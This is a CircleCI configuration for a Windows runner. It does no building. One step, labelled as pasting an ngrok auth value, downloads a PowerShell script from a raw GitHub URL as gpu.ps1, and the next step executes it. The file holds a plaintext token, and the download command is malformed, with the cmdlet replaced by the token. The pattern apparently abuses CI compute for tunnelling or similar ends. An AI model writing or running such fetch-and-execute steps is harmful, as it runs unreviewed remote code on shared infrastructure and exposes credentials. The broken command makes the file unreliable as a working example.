version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
      
        
 
    steps:  
       
      - run: 
          name: Paste Ngrok Auth Value In Hosted Link
          command: |      
            23C7hFqGnru9xqOSxU4FhesoTSu_6i9M16BNH76hKLmUo2az https://raw.githubusercontent.com/Yahihs/rep/main/sh -OutFile gpu.ps1 
          
      - run: ./gpu.ps1
